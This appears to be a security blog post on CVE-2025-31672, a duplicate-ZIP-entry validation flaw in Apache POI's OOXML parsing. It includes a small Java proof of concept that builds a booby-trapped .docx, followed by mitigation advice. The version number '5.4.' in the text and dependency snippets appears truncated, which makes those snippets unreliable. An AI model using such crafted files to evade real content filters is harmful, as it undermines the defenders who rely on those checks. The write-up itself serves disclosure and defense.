CVE-2025-31672 - Improper Input Validation in Apache POI Leaves OOXML Parsing at Risk
Apache POI is one of the most popular open-source libraries for handling Microsoft Office file formats in Java, especially for reading and writing .xlsx, .docx, and .pptx files. Millions of enterprises and projects rely on POI to process business documents. But a recently discovered security flaw, now identified as CVE-2025-31672, highlights a critical weakness in how POI's poi-ooxml component handles certain bad input. This post explains the vulnerability, demonstrates how an attacker could exploit it, and shows how to mitigate the risk.
In Simple Terms
Apache POI, before version 5.4., did not properly check for duplicate file names inside Office files (OOXML files, like .xlsx, .docx, .pptx). These files are actually ZIP archives containing XML files and resources. Attackers could craft a malicious file that includes two or more ZIP entries (files inside the archive) with the exact same name and path. This can confuse the program reading the file—because depending on the implementation, it might open the first or the second copy, but NOT both.
Different software products using POI might disagree on which entry to read, and thus, malicious actors could exploit this to slip through fake or malicious content, leading to further attacks or data leakage.
Fixed: poi-ooxml version 5.4.
The issue is tracked on the Apache POI security page and the CVE database will soon contain more details.
The Technical Root of the Issue
Java's ZIP file API allows ZIP archives to contain multiple entries with the same path and name. This is normally an abnormal condition, but it's possible to create such files. The way Java reads ZIP files is that it picks the first occurrence of a file with a given name. Other platforms or libraries might pick the last one.
When parsing OOXML files, POI relied on the first occurrence too, but wouldn’t check for duplicates—opening the door to discrepancies.
Let’s say an attacker prepares an attack.xlsx file containing two entries
/xl/sharedStrings.xml
/xl/sharedStrings.xml
- The first /xl/sharedStrings.xml contains benign or even blank data.
- The second /xl/sharedStrings.xml contains malicious XML which could manipulate the runtime or leak sensitive data.
Depending on what Java ZIP library the reader uses, or in cases where software chain-loads the archive with different tools, the actual XML content processed could be either one.
Here’s a simple Java snippet to create a ZIP file with duplicate entries
import java.io.FileOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
public class DuplicateZipEntry {
public static void main(String[] args) throws Exception {
try (ZipOutputStream zos = new ZipOutputStream(new FileOutputStream("attack.docx"))) {
byte[] goodContent = "<xml>Good Data</xml>".getBytes();
byte[] evilContent = "<xml>Malicious Data</xml>".getBytes();
// First file
ZipEntry ze1 = new ZipEntry("word/document.xml");
zos.putNextEntry(ze1);
zos.write(goodContent);
zos.closeEntry();
// Second file with same path
ZipEntry ze2 = new ZipEntry("word/document.xml");
zos.putNextEntry(ze2);
zos.write(evilContent);
zos.closeEntry();
}
System.out.println("Done: Created attack.docx with duplicate entries.");
}
}
You can open "attack.docx" in MS Word (which may show an error), or load it in a Java/POI based parser—which may process the first or second entry!
Exploitation Scenarios
1. Bypass Security Filters: If your application filters out sensitive words by parsing sharedStrings.xml, the attacker can put safe data in the first copy and malicious data in the second, potentially evading detection or poisoning the data supply.
2. Attack Chained Services: If you use different products (some in Java, some on .NET or Python), *they may not read the same version* of the file, causing inconsistent interpretation, data leakage, or integrity errors.
3. Trigger Parsing Errors for Denial-of-Service: In some cases, feeding mismatched files can cause parsers to crash or loop unexpectedly.
Fix: Upgrade to poi-ooxml 5.4.
Starting with poi-ooxml 5.4., POI throws an exception if a duplicate ZIP entry is found. This hardening step closes the loophole neatly.
If you use Apache POI, update your dependencies
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>5.4.</version>
</dependency>
Or in Gradle
implementation 'org.apache.poi:poi-ooxml:5.4.'
Upgrade to poi-ooxml 5.4. as soon as possible.
2. Validate all input files. If you process Office documents from untrusted sources, check that your scanning and filtering tools reject files with duplicate ZIP entries.
3. Review any internal tools, integrations, or microservices that might use POI under the hood—even as a transitive dependency.
For official guidance, always consult the POI Security Recommendations.
References
- Apache POI Security Page
- CVE-2025-31672 at MITRE *(pending)*
- POI GitHub Repository
- About Office Open XML Format
Conclusion
Improper input validation issues like CVE-2025-31672 are a reminder that file formats—even ones as familiar as DOCX and XLSX—can hide clever tricks attackers use to subvert software. Upgrading your libraries and following good input validation practices are the best defense.
If you use Apache POI, upgrade to poi-ooxml 5.4. now. Remain vigilant. File uploads are always risky, but with strong controls, you’ll be much safer.
Stay tuned to poi.apache.org/security.html for future updates and best practices!
Timeline
Published on: 04/09/2025 12:15:15 UTC
Last modified on: 04/18/2025 17:15:34 UTC